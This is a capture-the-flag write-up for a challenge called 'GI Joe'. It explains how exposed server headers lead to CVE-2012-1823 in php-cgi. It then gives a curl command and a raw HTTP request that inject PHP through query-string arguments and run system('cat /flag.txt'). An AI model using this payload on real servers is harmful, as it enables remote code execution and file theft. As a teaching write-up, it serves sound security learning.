GI Joe
by shreyas-sriram
The real American hero!
Connect here: http://jh2i.com:50008
Solution
- Exploring the page, we find that it is static and there are no interesting functionalities
- Looking at the requests and responses on Burp Suite, we see that too much server information is revealed
HTTP/1.1 200 OK
Date: Sun, 02 Aug 2020 15:37:05 GMT
Server: Apache/2.4.25 (Unix)
X-Powered-By: PHP/5.4.1
Connection: close
Content-Type: text/html
Content-Length: 8117
- Looking up on CVE (Common Vulnerabilities and Exposures) for the given server versions, we find CVE-2012-1823 , which is found in applications of certain PHP versions using
CGI script (aka php-cgi) - Proof of concept - POC
- It is a cakewalk from here-on, just have to follow the above POC
- Visit jh2i.com:50008/?-s to get the source code
- Notice that the source code reveals the location of the flag -
/flag.txt - Make a
POST Requestto jh2i.com:50008/?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input with<?php system('cat /flag.txt'); ?>asPOST datato obtain the flag
# Using cURL
$ curl http://jh2i.com:50008/\?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -X POST -d "<?php system('cat /flag.txt'); ?>" -i
# Using Burp Repeater
GET /?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input HTTP/1.1
Host: jh2i.com:50008
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 33
<?php system('cat /flag.txt'); ?>
Flag
flag{old_but_gold_attacks_with_cgi_joe}